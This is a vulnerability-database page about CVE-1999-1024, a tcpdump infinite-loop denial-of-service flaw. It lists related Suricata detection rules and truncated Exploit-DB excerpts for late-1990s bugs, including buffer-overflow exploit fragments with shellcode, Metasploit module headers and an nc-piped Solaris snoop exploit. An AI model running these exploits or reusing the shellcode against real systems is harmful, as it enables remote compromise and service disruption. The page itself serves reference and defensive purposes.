CVE-1999-1024
published 2001-11-28CVE-1999-1024: ip_print procedure in Tcpdump 3.4a allows remote attackers to cause a denial of service via a packet with a zero length header, which causes an infinite loop…
PriorityP424high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.91%
85.3th percentile
ip_print procedure in Tcpdump 3.4a allows remote attackers to cause a denial of service via a packet with a zero length header, which causes an infinite loop and core dump when tcpdump prints the packet.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lbl | tcpdump | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt"; flow:established,to_server; content:"|00 01 86 E4|"; depth:4; offset:16; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101908; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt"; content:"|00 01 86 E4|"; depth:4; offset:12; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101907; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow
exploitdb·2011-08-10
CVE-1999-1510 BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow
---
#!/usr/bin/python
# BisonFTP Server \n" %(sys.argv[0])
sys.exit()
print "\n[!] Connecting to %s ..." %(sys.argv[1])
# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(5)
# padding
buffer = "\x90" * 1092
# 368 bytes shellcode
buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09
Exploit-DB
The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)
exploitdb·2010-07-03
CVE-1999-1053 The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)
The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit)
---
##
# $Id: guestbook_ssi_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Matt Wright guestbook.pl Arbitrary Command Execution',
'Description' => %q{
The Matt Wright guestbook.pl [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9671 $',
'References' =>
[
[ 'CVE', '1999-1053' ],
[ 'OSVDB', '84' ],
[ 'BID', '776' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
Exploit-DB
Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'print_domain_name' Remote Buffer Overflow
exploitdb·1999-12-07
CVE-1999-0973 Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'print_domain_name' Remote Buffer Overflow
Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'print_domain_name' Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/858/info
If a solaris machine is running snoop in verbose mode, it may be possible to compromise its security remotely by exploiting a buffer overflow in snoop. The problem is a buffer with a predefined length of 1024 that can be overflowed in the print_domain_name function. The priviliges granted to arbitrary code which could be executed would be those of the user running snoop, root.
/*
by: K2,
version .2
this is a funny Solaris.
remote Solaris 2.7 x86 snoop exploit
rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW
run with ( ./snp ) | nc -u target_host_network 53
requires target host to be running "snoop"
verified with patch 108483-01
thx str/horizon for she
Exploit-DB
The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include
exploitdb·1999-11-05
CVE-1999-1053 The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include
The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Matt Wright guestbook.pl Arbitrary Command Execution',
'Description' => %q{
The Matt Wright guestbook.pl [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '1999-1053' ],
[ 'OSVDB', '84' ],
[ 'BID', '776' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
Exploit-DB
IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password
exploitdb·1999-10-24
CVE-1999-0944 IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password
IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password
---
source: https://www.securityfocus.com/bid/1763/info
IBM WebSphere ships with a tool called 'ikeyman' that encrypts server certificates/key pairs when the IBM HTTP Server and SSL connections are enabled. Ikeyman stores the password in a stash file which can be easily decrypted through the use of a freely available script
#!/usr/bin/perl -w
#
# unstash.pl - "decrypt" IBM HTTP server stash files. No, really. They
*are* this pathetic.
#
# sploit (BoByRiTe) 1999, Major Malfunction, code by Ben Laurie, cos I
dudn't dud perly thing.
use strict;
die "Usage: $0 \n" if $#ARGV != 0;
my $file=$ARGV[0];
open(F,$file) || die "Can't open $file: $!";
my $stash;
read F,$stash,1024;
my @unstash=map { $_^0xf5 } unpack("C*",$stash);
foreac
Exploit-DB
Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET
exploitdb·1999-08-25
CVE-1999-0744 Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET
Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET
---
source: https://www.securityfocus.com/bid/1024/info
A GET request containing over 4080 characters will cause the httpd.exe process to crash within Netscape Enterprise Server 3.6, resulting in a Dr. Watson error. Arbitrary code can be executed remotely at this point.
Netscape Enterprise Server 3.5 running on either Netware or Solaris is not known to be susceptible to this issue.
GET /(4080 character string) HTTP/1.0
Exploit-DB
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
exploitdb·1999-07-13
CVE-1999-0696 Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*
* Unixware 7.x rpc.cmsd exploit by jGgM
* http://www.netemperor.com/en/
* EMail: [email protected]
*/
#include
#include
#include
#include
#include
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define BUFFER_SIZE 1036
#define SHELL_START 1024
#define RET_LENGTH 12
#define ADJUST 100
#define NOP 0x90
#define LEN 68
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard [2000]*/
/* syscall: [200
Exploit-DB
tcpdump 3.4 - Protocol Four / Zero Header Length
exploitdb·1999-06-16
CVE-1999-1024 tcpdump 3.4 - Protocol Four / Zero Header Length
tcpdump 3.4 - Protocol Four / Zero Header Length
---
// source: https://www.securityfocus.com/bid/313/info
A vulnerability in tcpdump causes it to enter an infinite loop within the procedure ip_print() from the file print_ip.c when it receives a packet with IP protocol number four and a zero header length and it tries to print it. This may allow remote malicious users to evade network monitoring.
/*
tcpdump bug 3.4a? by BLADI ([email protected]);
On receiving an ip packet with Protocol-4 and ihl=0, tcpdump enters
an infinite loop within the procedure ip_print() from file print_ip.c
This happens because the header length (ihl) equals '0' and tcpdump
tries to print the packet
I've tried the bug in diferent OS's
Linux:
SuSE 6.x:
K2.0.36 tcpdump consumes all the system memory
K2.2.5
Exploit-DB
RedHat Linux 5.1 - xosview
exploitdb·1999-05-28
CVE-1999-1490 RedHat Linux 5.1 - xosview
RedHat Linux 5.1 - xosview
---
// source: https://www.securityfocus.com/bid/362/info
xosview is an X11 system monitoring application that ships with RedHat 5.1 installed setuid root. A buffer overflow vulnerability was found in Xrm.cc, the offending code listed below:
char userrfilename[1024];
strcpy(userrfilename, getenv("HOME"));
The userfilename can be overflowed and arbritrary code executed to gain root access locally.
* xosview 1.5.1 buffer overrun exploit
* brought to you by Kossak ([email protected])
*
* yep, this is a shameless rip from Aleph's tutorials, but it sure
* works... Lets keep those exploits coming!! :)
* Thanks to Chris Evans for posting the bug.
*/
/* NOTE!!! xosview needs an open X display for this to work, so remember
* to modify the source (line 62
Exploit-DB
Microsoft IIS 4 (Windows NT) - Log Avoidance
exploitdb·1999-01-22
CVE-1999-0448 Microsoft IIS 4 (Windows NT) - Log Avoidance
Microsoft IIS 4 (Windows NT) - Log Avoidance
---
// source: https://www.securityfocus.com/bid/191/info
An http get request against an IIS4 server will not be logged if the request is longer than 10150 bytes long.
/* Compile with eg Visual C++ and link with wsock32.lib
#include
#include
#include
int main (int argc, char *argv[])
{
int snd, rcv, err, portno,a=0,b, res;
char resp[1024];
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sa;
struct hostent *he;
SOCKET sock;
if (argc !=2)
{
printf("Usage:\nc:\\>%s target_machine\n\nDavid Litchfield\n21st January
1999\n", argv[0]);
return 0;
}
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
{
printf("No winsock.dll\n");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HI
Exploit-DB
Linux Kernel 2.0 - TCP Port Denial of Service
exploitdb·1999-01-19
CVE-1999-0451 Linux Kernel 2.0 - TCP Port Denial of Service
Linux Kernel 2.0 - TCP Port Denial of Service
---
/*
source: https://www.securityfocus.com/bid/343/info
It is possible to leak kernel memory and render TCP ports above 1024 unusable, locked forever in the CLOSE_WAIT state in linux kernels prior to the late 2.1.x and 2.2.0pre releases. In addition to being intentionally exploited, unix applications compiled on linux that are multithreaded may also cause these problems.
Below is a harmless example of the exploit:
*/
// This program will kill a random port on a linux machine. The kernel will
// forever listen to that port and send the connections nowhere. Tested with
// Linux kernel 2.0.35 and libc-2.0.7. Requires LinuxThreads to compile,
// but removing LinuxThreads from your system will not solve the problem.
// Discovered by Dav
Exploit-DB
Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Remote Buffer Overflow
exploitdb·1998-07-17
CVE-1999-0005 Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Remote Buffer Overflow
Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/130/info
A vulnerability exists in certain imapd implementations that allow an attacker to execute arbitrary code remotely. In certain instances, the code to be executed will be run with root privilege.
Imap supports a command 'AUTHENTICATE' which specifies the type of authentication mechanism to be used to open a mailbox. The value passed to the authenticate command is copied into a buffer of size 1024. The maximum size of this value, however, it 8192 characters. A failure to bound the read value to 1024 results in a buffer overflow.
The code which creates this problem is as follows:
char *mail_auth (char *mechanism,authresponse_t resp,int
Exploit-DB
RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (2)
exploitdb·1998-06-25
CVE-1999-0125 RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (2)
RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (2)
---
// source: https://www.securityfocus.com/bid/393/info
A buffer overrun exists in the /bin/mailx program. This program was originally developed as part of BSD, and is available on many Unix systems. By supplying a long, well crafted buffer as the username argument, an attacker can use it to execuate arbitrary code. On some systems, this will result in the ability to execute code as group mail.
// this is nothing special, it allows you to read files that are
// readable by the group 'mail'.
// feedback: segv
#include
#include
#include
#include
#include
#include
#include
void usage(char *prog);
void main(int argc, char *argv[])
{
char buffer[1024];
int fd, bytes;
if(argc != 3)
usage(argv[0]);
if((strcmp(argv[1],"-c")))
u
Exploit-DB
LibXt - 'XtAppInitialize()' Local Overflow *xterm
exploitdb·1997-05-14
CVE-1999-0040 LibXt - 'XtAppInitialize()' Local Overflow *xterm
LibXt - 'XtAppInitialize()' Local Overflow *xterm
---
/*
cxterm buffer overflow exploit for Linux. This code is tested on
both Slackware 3.1 and 3.2.
Ming Zhang
[email protected]
*/
#include
#include
#include
#include
#define CXTERM_PATH "/usr/X11R6/bin/cxterm"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i,OffSet = DEFAULT_OFFSET;
/* use a different offset if you find this program doesn'
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=92955903802773&w=2http://marc.info/?l=bugtraq&m=92963447601748&w=2http://marc.info/?l=bugtraq&m=92989907627051&w=2http://www.securityfocus.com/bid/313http://marc.info/?l=bugtraq&m=92955903802773&w=2http://marc.info/?l=bugtraq&m=92963447601748&w=2http://marc.info/?l=bugtraq&m=92989907627051&w=2http://www.securityfocus.com/bid/313
2001-11-28
Published